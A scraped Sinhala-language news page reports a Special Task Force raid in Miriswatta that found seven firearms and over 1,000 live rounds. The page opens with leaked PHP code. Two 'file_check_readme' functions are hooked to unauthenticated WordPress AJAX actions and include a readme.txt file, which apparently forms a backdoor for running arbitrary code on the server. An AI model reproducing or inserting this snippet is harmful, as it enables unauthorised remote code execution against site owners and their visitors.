if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මිරිස්වත්තේ වැටලීමකින් ගිනි අවි 07ක් සහ උණ්ඩ 1000ක් සොයා ගැනේ (PHOTOS) - mediahumanrights.lk
mediahumanrights.lk
Local News News

මිරිස්වත්තේ වැටලීමකින් ගිනි අවි 07ක් සහ උණ්ඩ 1000ක් සොයා ගැනේ (PHOTOS)

මිරිස්වත්ත ප්‍රදේශයේදී පොලිස් විශේෂ කාර්ය බලකාය විසින් සිදුකළ වැටලීමකින් ගිනි අවි 07ක් සහ ජීව උණ්ඩ 1000 කට අධික සංඛ්‍යාවක් ඇතුළු භාණ්ඩ කිහිපයක් සොයා ගෙන තිබෙනවා. සිද්ධිය සම්බන්ධයෙන් එක් සැකකරුවෙකු ද පොලිස් විශේෂ කාර්ය බලකාය විසින් අත්අඩංගුවට ගෙන තිබෙනවා.

ශ්‍රී ලංකා ගුවන් හමුදාවේ බුද්ධි අංශය විසින් ලබාදෙනු ලැබූ තොරතුරක් අනුව පොලිස් විශේෂ කාර්ය බලකාය විසින් මෙම වැටලීම සිදුකර ඇත

nethnews

Related posts

ජල ඒකක 15ට වැඩිය භාවිත කරන්නේ ඉහල ආදායම් ලබන්නන්.. ඔවුන්ගේ බිල්පත අනිවාර්යෙන් වැඩි කරනවා..- ඇමති වාසු

Shiran Viraj

බෝර්ඩ් උස්සනකොටම පෙට්‍රල් නැති වෙනවා….

Shiran Viraj

තැපැල් ඡන්දෙ දාන්න පොලිසියට අමතර දිනයක්…

Shiran Viraj